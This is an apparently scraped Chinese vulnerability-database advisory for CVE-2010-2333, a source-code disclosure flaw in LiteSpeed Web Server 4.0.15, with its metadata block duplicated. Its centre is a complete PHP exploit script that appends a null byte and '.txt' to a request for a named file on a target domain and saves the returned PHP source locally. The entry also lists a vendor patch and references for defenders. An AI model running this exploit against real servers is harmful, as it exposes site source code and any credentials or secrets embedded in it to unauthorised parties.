LiteSpeed Web Server HTTP请求源码泄露漏洞
添加时间:
2010-07-01
系统编号:
WAVDB-01673
BugCVE: CVE-2010-2333
BUGTRAQ: 40815
影响版本:
LiteSpeed Web Server 4.0.15
程序介绍:
解决方案:
厂商补丁:
LiteSpeed Technologies
----------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.litespeedtech.com/lat ... .0.15-released.html
信息来源:
<*来源:Kingcope (kingcope@gmx.net)
链接:http://secunia.com/advisories/40128/
http://marc.info/?l=full-disclosure&m=127643766428142&w=2
*>
2010-07-01
系统编号:
WAVDB-01673
BugCVE: CVE-2010-2333
BUGTRAQ: 40815
影响版本:
LiteSpeed Web Server 4.0.15
程序介绍:
LiteSpeed Web Server是一款高性能的web服务器。
漏洞分析:
LiteSpeed Web Server没有正确地处理HTTP请求,用户可以将所请求的扩展名更改为\x00.txt导致从返回中读取某些脚本(如PHP)的源码。
漏洞利用:
- <?php
- /*
- * LiteSpeed Web Server Remote Source Code Disclosure Exploit
- * Usage : php exploit.php domain.com /path
- * example : php exploit.php burtay.org index.php
- * Coded By Burtay
- * Special Thanks RMx And Megaturks Crews
- */
- echo "\n ->LiteSpeed Web Server Remote Source Code Disclosure Exploit<-\n\nStarting\n";
- $fp = fsockopen($argv[1], 80, $errno, $errstr, 30);
- if (!$fp)
- {
- echo "$errstr ($errno)<br />\n";
- }
- else {
- $out = "GET /".$argv[2]."\x00.txt HTTP/1.1\r\n";
- $out .= "Host: ".$argv[1]."\r\n";
- $out .= "Connection: Close\r\n\r\n";
- fwrite($fp, $out);
- while (!feof($fp)) {
- $gelen = fgets($fp, 128);
- $ac = fopen($argv[2],'ab');
- fwrite($ac,$gelen);
- fclose($ac);
- }
- echo "Dosya ".$argv[2]." ad? ile kaydedildi\n";
- echo "Coded By Burtay\n";
- echo "Burtay.Org\n";
- echo "Megaturks.Net\n";
- fclose($fp);
- }
- ?>
解决方案:
厂商补丁:
LiteSpeed Technologies
----------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.litespeedtech.com/lat ... .0.15-released.html
信息来源:
<*来源:Kingcope (kingcope@gmx.net)
链接:http://secunia.com/advisories/40128/
http://marc.info/?l=full-disclosure&m=127643766428142&w=2
*>